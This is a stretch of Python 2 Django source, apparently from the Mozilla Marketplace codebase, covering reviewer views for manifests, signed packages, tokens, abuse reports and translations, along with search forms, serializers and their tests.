if form and request.method == 'POST' and form.is_valid():
set_config(u'mkt_reviewers_motd', form.cleaned_data['motd'])
messages.success(request, _('Changes successfully saved.'))
return redirect(reverse('reviewers.apps.motd'))
data = context(request, form=form)
return render(request, 'reviewers/motd.html', data)
# TODO: Move these to the validator when they live there someday.
PRIVILEGED_PERMISSIONS = set([
'tcp-socket', 'contacts', 'device-storage:pictures',
'device-storage:videos', 'device-storage:music', 'device-storage:sdcard',
'browser', 'systemXHR', 'audio-channel-notification',
'audio-channel-alarm'])
CERTIFIED_PERMISSIONS = set([
'camera', 'tcp-socket', 'network-events', 'contacts',
'device-storage:apps', 'device-storage:pictures',
'device-storage:videos', 'device-storage:music', 'device-storage:sdcard',
'sms', 'telephony', 'browser', 'bluetooth', 'mobileconnection', 'power',
'settings', 'permissions', 'attention', 'webapps-manage',
'backgroundservice', 'networkstats-manage', 'wifi-manage', 'systemXHR',
'voicemail', 'deprecated-hwvideo', 'idle', 'time', 'embed-apps',
'background-sensors', 'cellbroadcast', 'audio-channel-notification',
'audio-channel-alarm', 'audio-channel-telephony', 'audio-channel-ringer',
'audio-channel-publicnotification', 'open-remote-window'])
def _get_permissions(manifest):
permissions = {}
for perm in manifest.get('permissions', {}).keys():
pval = permissions[perm] = {'type': 'web'}
if perm in PRIVILEGED_PERMISSIONS:
pval['type'] = 'priv'
elif perm in CERTIFIED_PERMISSIONS:
pval['type'] = 'cert'
pval['description'] = manifest['permissions'][perm].get('description')
return permissions
def _get_manifest_json(addon):
return addon.get_manifest_json(addon.versions.latest().all_files[0])
@any_permission_required([('AppLookup', 'View'), ('Apps', 'Review')])
@addon_view
@json_view
def app_view_manifest(request, addon):
headers = {}
manifest = {}
success = False
if addon.is_packaged:
manifest = _get_manifest_json(addon)
content = json.dumps(manifest, indent=4)
success = True
else: # Show the hosted manifest_url.
content, headers = u'', {}
if addon.manifest_url:
try:
req = requests.get(addon.manifest_url, verify=False)
content, headers = req.content, req.headers
success = True
except Exception:
content = u''.join(traceback.format_exception(*sys.exc_info()))
else:
success = True
try:
# Reindent the JSON.
manifest = json.loads(content)
content = json.dumps(manifest, indent=4)
except:
# If it's not valid JSON, just return the content as is.
pass
return {
'content': jinja2.escape(smart_decode(content)),
'headers': dict((jinja2.escape(k), jinja2.escape(v))
for k, v in headers.items()),
'success': success,
# Note: We're using `escape_all` on the values here since we know the
# keys of the nested dict don't come from user input (manifest) and are
# known safe.
'permissions': dict((jinja2.escape(k), escape_all(v))
for k, v in _get_permissions(manifest).items())
}
def reviewer_or_token_required(f):
@functools.wraps(f)
def wrapper(request, addon, *args, **kw):
# If there is a 'token' in request.GET we either return 200 or 403.
# Otherwise we treat it like a normal django view and redirect to a
# login page or check for Apps:Review permissions.
allowed = False
token = request.GET.get('token')
if token and Token.pop(token, data={'app_id': addon.id}):
log.info('Token for app:%s was successfully used' % addon.id)
allowed = True
elif not token and not request.user.is_authenticated():
return redirect_for_login(request)
elif acl.action_allowed(request, 'Apps', 'Review'):
allowed = True
if allowed:
if token:
log.info('Token provided for app:%s and all was happy'
% addon.id)
else:
log.info('Apps:Review (no token) all happy for app:%s'
% addon.id)
return f(request, addon, *args, **kw)
else:
if token:
log.info('Token provided for app:%s but was not valid'
% addon.id)
else:
log.info('Apps:Review permissions not met for app:%s'
% addon.id)
raise PermissionDenied
return wrapper
@addon_view
@reviewer_or_token_required
def mini_manifest(request, addon, version_id):
token = request.GET.get('token')
return http.HttpResponse(
_mini_manifest(addon, version_id, token),
content_type='application/x-web-app-manifest+json; charset=utf-8')
def _mini_manifest(addon, version_id, token=None):
if not addon.is_packaged:
raise http.Http404
version = get_object_or_404(addon.versions, pk=version_id)
file_ = version.all_files[0]
manifest = addon.get_manifest_json(file_)
package_path = absolutify(
reverse('reviewers.signed', args=[addon.app_slug, version.id]))
if token:
# Generate a fresh token.
token = Token(data={'app_id': addon.id})
token.save()
package_path = urlparams(package_path, token=token.token)
data = {
'name': manifest['name'],
'version': version.version,
'size': file_.size,
'release_notes': version.releasenotes,
'package_path': package_path,
}
for key in ['developer', 'icons', 'locales']:
if key in manifest:
data[key] = manifest[key]
return json.dumps(data, cls=JSONEncoder)
@permission_required('Apps', 'Review')
@addon_view
def app_abuse(request, addon):
reports = AbuseReport.objects.filter(addon=addon).order_by('-created')
total = reports.count()
reports = paginate(request, reports, count=total)
return render(request, 'reviewers/abuse.html',
context(request, addon=addon, reports=reports,
total=total))
@addon_view
@reviewer_or_token_required
def get_signed_packaged(request, addon, version_id):
version = get_object_or_404(addon.versions, pk=version_id)
file = version.all_files[0]
path = addon.sign_if_packaged(version.pk, reviewer=True)
if not path:
raise http.Http404
log.info('Returning signed package addon: %s, version: %s, path: %s' %
(addon.pk, version_id, path))
return HttpResponseSendFile(request, path, content_type='application/zip',
etag=file.hash.split(':')[-1])
@permission_required('Apps', 'Review')
def performance(request, username=None):
is_admin = acl.action_allowed(request, 'Admin', '%')
if username:
if username == request.amo_user.username:
user = request.amo_user
elif is_admin:
user = get_object_or_404(UserProfile, username=username)
else:
raise http.Http404
else:
user = request.amo_user
today = datetime.date.today()
month_ago = today - datetime.timedelta(days=30)
year_ago = today - datetime.timedelta(days=365)
total = ReviewerScore.get_total(user)
totals = ReviewerScore.get_breakdown(user)
months = ReviewerScore.get_breakdown_since(user, month_ago)
years = ReviewerScore.get_breakdown_since(user, year_ago)
def _sum(iter, types):
return sum(s.total for s in iter if s.atype in types)
breakdown = {
'month': {
'addons': _sum(months, amo.GROUP_TYPE_ADDON),
'apps': _sum(months, amo.GROUP_TYPE_WEBAPP),
},
'year': {
'addons': _sum(years, amo.GROUP_TYPE_ADDON),
'apps': _sum(years, amo.GROUP_TYPE_WEBAPP),
},
'total': {
'addons': _sum(totals, amo.GROUP_TYPE_ADDON),
'apps': _sum(totals, amo.GROUP_TYPE_WEBAPP),
}
}
ctx = context(request, **{
'profile': user,
'total': total,
'breakdown': breakdown,
})
return render(request, 'reviewers/performance.html', ctx)
@any_permission_required([('Apps', 'Review')])
def leaderboard(request):
return render(request, 'reviewers/leaderboard.html',
context(request,
**{'scores': ReviewerScore.all_users_by_score()}))
@permission_required('Apps', 'Review')
@json_view
def apps_reviewing(request):
return render(request, 'reviewers/apps_reviewing.html',
context(request,
**{'tab': 'reviewing',
'apps': AppsReviewing(request).get_apps()}))
@permission_required('Apps', 'Review')
def attachment(request, attachment):
"""
Serve an attachment directly to the user.
"""
try:
a = ActivityLogAttachment.objects.get(pk=attachment)
full_path = os.path.join(settings.REVIEWER_ATTACHMENTS_PATH,
a.filepath)
fsock = open(full_path, 'r')
except (ActivityLogAttachment.DoesNotExist, IOError,):
response = http.HttpResponseNotFound()
else:
filename = urllib.quote(a.filename())
response = http.HttpResponse(fsock,
mimetype='application/force-download')
response['Content-Disposition'] = 'attachment; filename=%s' % filename
response['Content-Length'] = os.path.getsize(full_path)
return response
def _retrieve_translation(text, language):
try:
r = requests.get(
settings.GOOGLE_TRANSLATE_API_URL, params={
'key': getattr(settings, 'GOOGLE_API_CREDENTIALS', ''),
'q': text, 'target': language})
except Exception, e:
log.error(e)
raise
try:
translated = (HTMLParser.HTMLParser().unescape(r.json()['data']
['translations'][0]['translatedText']))
except (KeyError, IndexError):
translated = ''
return translated, r
@waffle_switch('reviews-translate')
@permission_required('Apps', 'Review')
def review_translate(request, addon_slug, review_pk, language):
review = get_object_or_404(Review, addon__slug=addon_slug, pk=review_pk)
if '-' in language:
language = language.split('-')[0]
if request.is_ajax():
title = ''
body = ''
status = 200
if review.title is not None:
title, r = _retrieve_translation(review.title, language)
if r.status_code != 200:
status = r.status_code
if review.body is not None:
body, r = _retrieve_translation(review.body, language)
if r.status_code != 200:
status = r.status_code
return http.HttpResponse(json.dumps({'title': title, 'body': body}),
status=status)
else:
return redirect(settings.GOOGLE_TRANSLATE_REDIRECT_URL.format(
lang=language, text=review.body))
class ReviewingView(ListAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
permission_classes = [GroupPermission('Apps', 'Review')]
serializer_class = ReviewingSerializer
def get_queryset(self):
return [row['app'] for row in AppsReviewing(self.request).get_apps()]
class ReviewersSearchView(SearchView):
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [GroupPermission('Apps', 'Review')]
form_class = ApiReviewersSearchForm
serializer_class = ReviewersESAppSerializer
def search(self, request):
form_data = self.get_search_data(request)
query = form_data.get('q', '')
base_filters = {'type': form_data['type']}
if form_data.get('status') != 'any':
base_filters['status'] = form_data.get('status')
qs = S(WebappIndexer).filter(**base_filters)
qs = self.apply_filters(request, qs, data=form_data)
qs = apply_reviewer_filters(request, qs, data=form_data)
page = self.paginate_queryset(qs)
return self.get_pagination_serializer(page), query
def apply_reviewer_filters(request, qs, data=None):
for k in ('has_info_request', 'has_editor_comment'):
if data.get(k, None) is not None:
qs = qs.filter(**{
'latest_version.%s' % k: data[k]
})
if data.get('is_escalated', None) is not None:
qs = qs.filter(is_escalated=data['is_escalated'])
is_tarako = data.get('is_tarako')
if is_tarako is not None:
if is_tarako:
qs = qs.filter(tags='tarako')
else:
qs = qs.filter(~F(tags='tarako'))
return qs
class ApproveRegion(SlugOrIdMixin, CreateAPIView):
"""
TODO: Document this API.
"""
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
model = Webapp
slug_field = 'app_slug'
def get_permissions(self):
region = parse_region(self.request.parser_context['kwargs']['region'])
region_slug = region.slug.upper()
return (GroupPermission('Apps', 'ReviewRegion%s' % region_slug),)
def get_queryset(self):
region = parse_region(self.request.parser_context['kwargs']['region'])
return self.model.objects.pending_in_region(region)
def post(self, request, pk, region, *args, **kwargs):
app = self.get_object()
region = parse_region(region)
form = ApproveRegionForm(request.DATA, app=app, region=region)
if not form.is_valid():
raise ParseError(dict(form.errors.items()))
form.save()
return Response({'approved': bool(form.cleaned_data['approve'])})
class GenerateToken(SlugOrIdMixin, CreateAPIView):
"""
This generates a short-lived token to be used by the APK factory service
for authentication of requests to the reviewer mini-manifest and package.
"""
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = [GroupPermission('Apps', 'Review')]
model = Webapp
slug_field = 'app_slug'
def post(self, request, pk, *args, **kwargs):
app = self.get_object()
token = Token(data={'app_id': app.id})
token.save()
log.info('Generated token on app:%s for user:%s' % (
app.id, request.amo_user.id))
return Response({'token': token.token})
########NEW FILE########
__FILENAME__ = forms
from django import forms
from tower import ugettext_lazy as _lazy
from addons.models import Category
import amo
from mkt.api.forms import SluggableModelChoiceField
ADDON_CHOICES = [(k, k) for k in amo.MKT_ADDON_TYPES_API.keys()]
SORT_CHOICES = [
(None, _lazy(u'Relevance')),
('popularity', _lazy(u'Popularity')),
('downloads', _lazy(u'Weekly Downloads')),
('rating', _lazy(u'Top Rated')),
('price', _lazy(u'Price')),
('created', _lazy(u'Newest')),
('reviewed', _lazy(u'Reviewed')),
('name', _lazy(u'Name')),
]
FREE_SORT_CHOICES = [(k, v) for k, v in SORT_CHOICES if k != 'price']
PRICE_CHOICES = [
(None, _lazy(u'All')),
('free', _lazy(u'Free')),
('paid', _lazy(u'Paid')),
]
APP_TYPE_CHOICES = [
('', _lazy(u'Any App Type')),
('hosted', _lazy(u'Hosted')),
('packaged', _lazy(u'Packaged')),
('privileged', _lazy(u'Privileged packaged app')),
]
PREMIUM_CHOICES = [
('free', _lazy(u'Free')),
('free-inapp', _lazy(u'Free with In-app')),
('premium', _lazy(u'Premium')),
('premium-inapp', _lazy(u'Premium with In-app')),
('other', _lazy(u'Other System for In-App')),
]
DEVICE_CHOICES = [
('', _lazy(u'Any Device Type')),
('desktop', _lazy(u'Desktop')),
('mobile', _lazy(u'Mobile')),
('tablet', _lazy(u'Tablet')),
('firefoxos', _lazy(u'Firefox OS')),
]
DEVICE_CHOICES_IDS = {
'desktop': amo.DEVICE_DESKTOP.id,
'mobile': amo.DEVICE_MOBILE.id,
'tablet': amo.DEVICE_TABLET.id,
'firefoxos': amo.DEVICE_GAIA.id,
}
CATEGORY_CHOICES = [
('', _lazy(u'All Categories')),
('games', _lazy(u'Games')),
('books', _lazy(u'Books')),
('business', _lazy(u'Business')),
('education', _lazy(u'Education')),
('entertainment', _lazy(u'Entertainment')),
('health-fitness', _lazy(u'Health & Fitness')),
('lifestyle', _lazy(u'Lifestyle')),
('maps-navigation', _lazy(u'Maps & Navigation')),
('music', _lazy(u'Music')),
('news-weather', _lazy(u'News & Weather')),
('photo-video', _lazy(u'Photo & Video')),
('productivity', _lazy(u'Productivity')),
('reference', _lazy(u'Reference')),
('shopping', _lazy(u'Shopping')),
('social', _lazy(u'Social')),
('sports', _lazy(u'Sports')),
('travel', _lazy(u'Travel')),
('utilities', _lazy(u'Utilities'))
]
TARAKO_CATEGORIES_MAPPING = {
'tarako-tools': ['business', 'education', 'productivity',
'reference', 'utilities'],
'tarako-games': ['games'],
'tarako-lifestyle': ['books', 'entertainment', 'health-fitness',
'lifestyle', 'maps-navigation', 'music',
'news-weather', 'photo-video', 'shopping',
'social', 'sports', 'travel'],
}
TARAKO_CATEGORY_CHOICES = [
('tarako-tools', _lazy(u'Tools')),
('tarako-games', _lazy(u'Games')),
('tarako-lifestyle', _lazy(u'Lifestyle')),
]
# Tags are only available to admins. They are free-form, and we expose them in
# the API, but they are not supposed to be manipulated by users atm, so we only
# allow to search for specific, whitelisted ones.
TAG_CHOICES = [
('tarako', 'tarako'),
]
# "Relevance" doesn't make sense for Category listing pages.
LISTING_SORT_CHOICES = SORT_CHOICES[1:]
FREE_LISTING_SORT_CHOICES = [(k, v) for k, v in LISTING_SORT_CHOICES
if k != 'price']
SEARCH_PLACEHOLDERS = {'apps': _lazy(u'Search for apps')}
class SimpleSearchForm(forms.Form):
"""Powers the search box on every page."""
q = forms.CharField(required=False)
cat = forms.CharField(required=False, widget=forms.HiddenInput)
def clean_cat(self):
return self.data.get('cat', 'all')
def placeholder(self, txt=None):
return txt or SEARCH_PLACEHOLDERS['apps']
class ApiSearchForm(forms.Form):
q = forms.CharField(
required=False, label=_lazy(u'Search'),
widget=forms.TextInput(attrs={'autocomplete': 'off',
'placeholder': _lazy(u'Search')}))
type = forms.ChoiceField(required=False, choices=ADDON_CHOICES,
label=_lazy(u'Add-on type'))
cat = forms.ChoiceField(required=False, label=_lazy(u'Categories'),
choices=CATEGORY_CHOICES + TARAKO_CATEGORY_CHOICES)
device = forms.ChoiceField(
required=False, choices=DEVICE_CHOICES, label=_lazy(u'Device type'))
premium_types = forms.MultipleChoiceField(
widget=forms.CheckboxSelectMultiple(), required=False,
label=_lazy(u'Premium types'), choices=PREMIUM_CHOICES)
# TODO: Make some fancy `MultipleCommaSeperatedChoiceField` field.
app_type = forms.MultipleChoiceField(
required=False, choices=APP_TYPE_CHOICES,
widget=forms.CheckboxSelectMultiple(), label=_lazy(u'App type'))
manifest_url = forms.CharField(required=False, label=_lazy('Manifest URL'))
offline = forms.NullBooleanField(required=False,
label=_lazy('Works offline'))
languages = forms.CharField(required=False,
label=_lazy('Supported languages'))
sort = forms.MultipleChoiceField(required=False,
choices=LISTING_SORT_CHOICES)
limit = forms.IntegerField(required=False, widget=forms.HiddenInput())
tag = forms.ChoiceField(required=False, label=_lazy(u'Tags'),
choices=TAG_CHOICES)
def __init__(self, *args, **kw):
super(ApiSearchForm, self).__init__(*args, **kw)
self.initial.update({
'type': 'app',
'status': 'pending',
})
def clean_cat(self):
# If request category is a tarako one, get the corresponding list of
# slugs, otherwise just build a list with the slug requested.
if self.cleaned_data['cat']:
return TARAKO_CATEGORIES_MAPPING.get(self.cleaned_data['cat'],
[self.cleaned_data['cat']])
return None
def clean_type(self):
return amo.MKT_ADDON_TYPES_API.get(self.cleaned_data['type'],
amo.ADDON_WEBAPP)
def clean_premium_types(self):
"""After cleaned, return a list of ints for the constants."""
pt_ids = []
for pt in self.cleaned_data.get('premium_types'):
pt_id = amo.ADDON_PREMIUM_API_LOOKUP.get(pt)
if pt_id is not None:
pt_ids.append(pt_id)
return pt_ids
def clean_app_type(self):
"""After cleaned, return a list of ints for the constants."""
at_ids = []
for at in self.cleaned_data.get('app_type'):
at_id = amo.ADDON_WEBAPP_TYPES_LOOKUP.get(at)
if at_id is not None:
at_ids.append(at_id)
return at_ids
########NEW FILE########
__FILENAME__ = helpers
from jingo import register
from . import forms
@register.function
def SimpleSearchForm(data, *args):
return forms.SimpleSearchForm(data)
########NEW FILE########
__FILENAME__ = middleware
import logging
from django.shortcuts import render
from pyelasticsearch.exceptions import ElasticHttpError
log = logging.getLogger('z.es')
class ElasticsearchExceptionMiddleware(object):
def process_exception(self, request, exception):
if (issubclass(exception.__class__, ElasticHttpError)):
log.error(u'Elasticsearch error: %s' % exception)
return render(request, 'search/down.html', status=503)
########NEW FILE########
__FILENAME__ = serializers
from datetime import datetime
from django.conf import settings
from django.core.urlresolvers import reverse
from rest_framework import serializers
import amo
import mkt
from addons.models import Category, Preview
from amo.helpers import absolutify
from constants.applications import DEVICE_TYPES
from mkt.api.fields import ESTranslationSerializerField
from mkt.submit.serializers import SimplePreviewSerializer
from mkt.webapps.models import Geodata, Webapp
from mkt.webapps.serializers import AppSerializer, SimpleAppSerializer
from mkt.webapps.utils import (dehydrate_content_rating,
dehydrate_descriptors,
dehydrate_interactives)
from versions.models import Version
class ESAppSerializer(AppSerializer):
# Fields specific to search.
absolute_url = serializers.SerializerMethodField('get_absolute_url')
is_offline = serializers.BooleanField()
reviewed = serializers.DateField()
# Override previews, because we don't need the full PreviewSerializer.
previews = SimplePreviewSerializer(many=True, source='all_previews')
# Override those, because we want a different source. Also, related fields
# will call self.queryset early if they are not read_only, so force that.
categories = serializers.SlugRelatedField(read_only=True,
many=True, slug_field='slug', source='all_categories')
manifest_url = serializers.CharField(source='manifest_url')
# Override translations, because we want a different field.
banner_message = ESTranslationSerializerField(
source='geodata.banner_message')
description = ESTranslationSerializerField()
homepage = ESTranslationSerializerField()
name = ESTranslationSerializerField()
release_notes = ESTranslationSerializerField(
source='current_version.releasenotes')
support_email = ESTranslationSerializerField()
support_url = ESTranslationSerializerField()
class Meta(AppSerializer.Meta):
fields = AppSerializer.Meta.fields + ['absolute_url', 'is_offline',
'reviewed']
def __init__(self, *args, **kwargs):
super(ESAppSerializer, self).__init__(*args, **kwargs)
# Remove fields that we don't have in ES at the moment.
self.fields.pop('upsold', None)
# Set all fields as read_only just in case.
for field_name in self.fields:
self.fields[field_name].read_only = True
@property
def data(self):
"""
Returns the serialized data on the serializer.
"""
if self._data is None:
if self.many:
self._data = [self.to_native(item) for item in self.object]
else:
self._data = self.to_native(self.object)
return self._data
def field_to_native(self, obj, field_name):
# DRF's field_to_native calls .all(), which we want to avoid, so we
# provide a simplified version that doesn't and just iterates on the
# object list.
return [self.to_native(item) for item in obj.object_list]
def to_native(self, obj):
app = self.create_fake_app(obj._source)
return super(ESAppSerializer, self).to_native(app)
def create_fake_app(self, data):
"""Create a fake instance of Webapp and related models from ES data."""
is_packaged = data['app_type'] != amo.ADDON_WEBAPP_HOSTED
is_privileged = data['app_type'] == amo.ADDON_WEBAPP_PRIVILEGED
obj = Webapp(id=data['id'], app_slug=data['app_slug'],
is_packaged=is_packaged, type=amo.ADDON_WEBAPP,
icon_type='image/png')
# Set relations and attributes we need on those relations.
# The properties set on latest_version and current_version differ
# because we are only setting what the serializer is going to need.
# In particular, latest_version.is_privileged needs to be set because
# it's used by obj.app_type_id.
obj.listed_authors = []
obj._current_version = Version()
obj._current_version.addon = obj
obj._current_version._developer_name = data['author']
obj._current_version.supported_locales = data['supported_locales']
obj._current_version.version = data['current_version']
obj._latest_version = Version()
obj._latest_version.is_privileged = is_privileged
obj._geodata = Geodata()
obj.all_categories = [Category(slug=cat) for cat in data['category']]
obj.all_previews = [Preview(id=p['id'], modified=p['modified'],
filetype=p['filetype']) for p in data['previews']]
obj._device_types = [DEVICE_TYPES[d] for d in data['device']]
# Set base attributes on the "fake" app using the data from ES.
# It doesn't mean they'll get exposed in the serializer output, that
# depends on what the fields/exclude attributes in Meta.
for field_name in ('created', 'modified', 'default_locale',
'icon_hash', 'is_escalated', 'is_offline',
'manifest_url', 'premium_type', 'regions',
'reviewed', 'status', 'weekly_downloads'):
setattr(obj, field_name, data.get(field_name))
# Attach translations for all translated attributes.
for field_name in ('name', 'description', 'homepage', 'support_email',
'support_url'):
ESTranslationSerializerField.attach_translations(obj,
data, field_name)
ESTranslationSerializerField.attach_translations(obj._geodata,
data, 'banner_message')
ESTranslationSerializerField.attach_translations(obj._current_version,
data, 'release_notes', target_name='releasenotes')
# Set attributes that have a different name in ES.
obj.public_stats = data['has_public_stats']
# Override obj.get_region() with a static list of regions generated
# from the region_exclusions stored in ES.
obj.get_regions = obj.get_regions(obj.get_region_ids(restofworld=True,
excluded=data['region_exclusions']))
# Some methods below will need the raw data from ES, put it on obj.
obj.es_data = data
return obj
def get_content_ratings(self, obj):
body = (mkt.regions.REGION_TO_RATINGS_BODY().get(
self.context['request'].REGION.slug, 'generic'))
return {
'body': body,
'rating': dehydrate_content_rating(
(obj.es_data.get('content_ratings') or {})
.get(body)) or None,
'descriptors': dehydrate_descriptors(
obj.es_data.get('content_descriptors', {})
).get(body, []),
'interactives': dehydrate_interactives(
obj.es_data.get('interactive_elements', [])),
}
def get_versions(self, obj):
return dict((v['version'], v['resource_uri'])
for v in obj.es_data['versions'])
def get_ratings_aggregates(self, obj):
return obj.es_data.get('ratings', {})
def get_upsell(self, obj):
upsell = obj.es_data.get('upsell', False)
if upsell:
region_id = self.context['request'].REGION.id
exclusions = upsell.get('region_exclusions')
if exclusions is not None and region_id not in exclusions:
upsell['resource_uri'] = reverse('app-detail',
kwargs={'pk': upsell['id']})
else:
upsell = False
return upsell
def get_absolute_url(self, obj):
return absolutify(obj.get_absolute_url())
def get_tags(self, obj):
return obj.es_data['tags']
class SimpleESAppSerializer(ESAppSerializer):
class Meta(SimpleAppSerializer.Meta):
pass
class SuggestionsESAppSerializer(ESAppSerializer):
icon = serializers.SerializerMethodField('get_icon')
class Meta(ESAppSerializer.Meta):
fields = ['name', 'description', 'absolute_url', 'icon']
def get_icon(self, app):
return app.get_icon_url(64)
class RocketbarESAppSerializer(serializers.Serializer):
name = ESTranslationSerializerField()
@property
def data(self):
if self._data is None:
self._data = [self.to_native(o['payload']) for o in self.object]
return self._data
def to_native(self, obj):
# fake_app is a fake instance because we need to access a couple
# properties and methods on Webapp. It should never hit the database.
fake_app = Webapp(
id=obj['id'], icon_type='image/png', type=amo.ADDON_WEBAPP,
default_locale=obj.get('default_locale', settings.LANGUAGE_CODE),
icon_hash=obj.get('icon_hash'),
modified=datetime.strptime(obj['modified'], '%Y-%m-%dT%H:%M:%S'))
ESTranslationSerializerField.attach_translations(fake_app, obj, 'name')
return {
'name': self.fields['name'].field_to_native(fake_app, 'name'),
'icon': fake_app.get_icon_url(64),
'slug': obj['slug'],
'manifest_url': obj['manifest_url'],
}
########NEW FILE########
__FILENAME__ = test_filters
import json
import test_utils
from nose.tools import ok_
from django.contrib.auth.models import AnonymousUser
import amo
from addons.models import Category
from mkt import regions
from mkt.api.tests.test_oauth import BaseOAuth
from mkt.regions import set_region
from mkt.reviewers.forms import ApiReviewersSearchForm
from mkt.search.forms import (ApiSearchForm, DEVICE_CHOICES_IDS,
TARAKO_CATEGORIES_MAPPING)
from mkt.search.views import _filter_search
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class TestSearchFilters(BaseOAuth):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
super(TestSearchFilters, self).setUp()
self.req = test_utils.RequestFactory().get('/')
self.req.user = AnonymousUser()
self.category = Category.objects.create(name='games', slug='games',
type=amo.ADDON_WEBAPP)
# Pick a region that has relatively few filters.
set_region(regions.UK.slug)
self.form_class = ApiSearchForm
def _grant(self, rules):
self.grant_permission(self.profile, rules)
self.req.groups = self.profile.groups.all()
def _filter(self, req, filters, sorting=None, **kwargs):
form = self.form_class(filters)
if form.is_valid():
qs = Webapp.from_search(self.req, **kwargs)
return _filter_search(
self.req, qs, form.cleaned_data, sorting)._build_query()
else:
return form.errors.copy()
def test_q(self):
qs = self._filter(self.req, {'q': 'search terms'})
qs_str = json.dumps(qs)
ok_('"query": "search terms"' in qs_str)
# TODO: Could do more checking here.
def test_fuzzy_single_word(self):
qs = self._filter(self.req, {'q': 'term'})
qs_str = json.dumps(qs)
ok_('fuzzy' in qs_str)
def test_no_fuzzy_multi_word(self):
qs = self._filter(self.req, {'q': 'search terms'})
qs_str = json.dumps(qs)
ok_('fuzzy' not in qs_str)
def _addon_type_check(self, query, expected=amo.ADDON_WEBAPP):
qs = self._filter(self.req, query)
ok_({'term': {'type': expected}} in qs['filter']['and'],
'Unexpected type. Expected: %s.' % expected)
def test_addon_type(self):
# Test all that should end up being ADDON_WEBAPP.
# Note: Addon type permission can't be checked here b/c the acl check
# happens in the view, not the _filter_search call.
self._addon_type_check({})
self._addon_type_check({'type': 'app'})
# Test a bad value.
qs = self._filter(self.req, {'type': 'vindaloo'})
ok_(u'Select a valid choice' in qs['type'][0])
def _status_check(self, query, expected=amo.STATUS_PUBLIC):
qs = self._filter(self.req, query)
ok_({'term': {'status': expected}} in qs['filter']['and'],
'Unexpected status. Expected: %s.' % expected)
def test_status(self):
self.form_class = ApiReviewersSearchForm
# Test all that should end up being public.
# Note: Status permission can't be checked here b/c the acl check
# happens in the view, not the _filter_search call.
self._status_check({})
self._status_check({'status': 'public'})
self._status_check({'status': 'rejected'})
# Test a bad value.
qs = self._filter(self.req, {'status': 'vindaloo'})
ok_(u'Select a valid choice' in qs['status'][0])
def test_category(self):
qs = self._filter(self.req, {'cat': self.category.slug})
ok_({'in': {'category': [self.category.slug]}} in qs['filter']['and'])
def test_tag(self):
qs = self._filter(self.req, {'tag': 'tarako'})
ok_({'term': {'tags': 'tarako'}} in qs['filter']['and'], qs['filter']['and'])
def test_tarako_categories(self):
qs = self._filter(self.req, {'cat': 'tarako-lifestyle'})
ok_({'in': {'category': TARAKO_CATEGORIES_MAPPING['tarako-lifestyle']}}
in qs['filter']['and'])
qs = self._filter(self.req, {'cat': 'tarako-games'})
ok_({'in': {'category': TARAKO_CATEGORIES_MAPPING['tarako-games']}}
in qs['filter']['and'])
qs = self._filter(self.req, {'cat': 'tarako-tools'})
ok_({'in': {'category': TARAKO_CATEGORIES_MAPPING['tarako-tools']}}
in qs['filter']['and'])
def test_device(self):
qs = self._filter(self.req, {'device': 'desktop'})
ok_({'term': {
'device': DEVICE_CHOICES_IDS['desktop']}} in qs['filter']['and'])
def test_premium_types(self):
ptype = lambda p: amo.ADDON_PREMIUM_API_LOOKUP.get(p)
# Test a single premium type.
qs = self._filter(self.req, {'premium_types': ['free']})
ok_({'in': {'premium_type': [ptype('free')]}} in qs['filter']['and'])
# Test many premium types.
qs = self._filter(self.req, {'premium_types': ['free', 'free-inapp']})
ok_({'in': {'premium_type': [ptype('free'), ptype('free-inapp')]}}
in qs['filter']['and'])
# Test a non-existent premium type.
qs = self._filter(self.req, {'premium_types': ['free', 'platinum']})
ok_(u'Select a valid choice' in qs['premium_types'][0])
def test_app_type(self):
qs = self._filter(self.req, {'app_type': ['hosted']})
ok_({'in': {'app_type': [1]}} in qs['filter']['and'])
def test_manifest_url(self):
url = 'http://hy.fr/manifest.webapp'
qs = self._filter(self.req, {'manifest_url': url})
ok_({'term': {'manifest_url': url}} in qs['filter']['and'])
def test_offline(self):
"""Ensure we are filtering by offline-capable apps."""
qs = self._filter(self.req, {'offline': 'True'})
ok_({'term': {'is_offline': True}} in qs['filter']['and'])
def test_online(self):
"""Ensure we are filtering by apps that require online access."""
qs = self._filter(self.req, {'offline': 'False'})
ok_({'term': {'is_offline': False}} in qs['filter']['and'])
def test_offline_and_online(self):
"""Ensure we are not filtering by offline/online by default."""
qs = self._filter(self.req, {})
ok_({'term': {'is_offline': True}} not in qs['filter']['and'])
ok_({'term': {'is_offline': False}} not in qs['filter']['and'])
def test_languages(self):
qs = self._filter(self.req, {'languages': 'fr'})
ok_({'in': {'supported_locales': ['fr']}} in qs['filter']['and'])
qs = self._filter(self.req, {'languages': 'ar,en-US'})
ok_({'in': {'supported_locales': ['ar', 'en-US']}}
in qs['filter']['and'])
def test_region_exclusions(self):
qs = self._filter(self.req, {'q': 'search terms'}, region=regions.CO)
ok_({'not': {'filter': {'term': {'region_exclusions': regions.CO.id}}}}
in qs['filter']['and'])
def test_region_exclusions_override(self):
self.create_flag('override-region-exclusion')
qs = self._filter(self.req, {'q': 'search terms'}, region=regions.CO)
ok_({'not': {'filter': {'term': {'region_exclusions': regions.CO.id}}}}
not in qs['filter']['and'])
########NEW FILE########
__FILENAME__ = test_middleware
import mock
from nose.tools import eq_
from pyelasticsearch import exceptions
from test_utils import RequestFactory
import amo.tests
from mkt.search.middleware import ElasticsearchExceptionMiddleware as ESM
class TestElasticsearchExceptionMiddleware(amo.tests.TestCase):
def setUp(self):
self.request = RequestFactory()
@mock.patch('mkt.search.middleware.render')
def test_exceptions_we_catch(self, render_mock):
# These are instantiated with an error string.
for e in [exceptions.ElasticHttpNotFoundError,
exceptions.IndexAlreadyExistsError,
exceptions.ElasticHttpError]:
ESM().process_exception(self.request, e(503, 'ES ERROR'))
render_mock.assert_called_with(self.request, 'search/down.html',
status=503)
render_mock.reset_mock()
@mock.patch('mkt.search.middleware.render')
def test_exceptions_we_do_not_catch(self, render_mock):
ESM().process_exception(self.request, Exception)
eq_(render_mock.called, False)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import json
from urlparse import urlparse
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db.models.query import QuerySet
